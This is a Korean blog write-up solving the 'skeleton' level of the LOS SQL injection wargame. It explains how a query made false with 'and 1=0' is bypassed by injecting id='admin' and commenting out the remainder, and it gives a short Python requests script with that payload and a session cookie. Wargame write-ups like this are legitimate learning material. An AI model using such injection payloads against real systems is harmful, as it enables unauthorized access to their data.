10. LOS - skeleton
2018. 8. 7. 07:17ㆍWarGame/LOS
LOS 10번째 문제 skeleton입니다!
먼저 코드를 보면
pw뒤에 and 1 = 0으로 만들어줘서 고의적으로 거짓으로 만들어 줬습니다.
그럼 저 부분을 참으로 만들어줘야하는데
저는 id에 'admin'을 넣고 뒷부분을 모두 주석으로 처리해주어서 풀었습니다 :)
페이로드는 다음과 같습니다.
1 2 3 4 5 6 7 8 9 10 11 | import requests import string URL = "http://los.eagle-jump.org/skeleton_8d9cbfe1efbd44cfbbdc63fa605e5f1b.php" payload = "?pw=admin' or id='admin'%23" URL += payload cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11") response = requests.get(URL, cookies = cookies) print(response.text) | cs |
'WarGame > LOS' 카테고리의 다른 글
| 12. LOS - darknight (0) | 2018.08.09 |
|---|---|
| 11. LOS - golem (0) | 2018.08.08 |
| 9. LOS - vampire (0) | 2018.08.06 |
| 8. LOS - troll (0) | 2018.08.05 |
| 7. LOS - orge (0) | 2018.08.05 |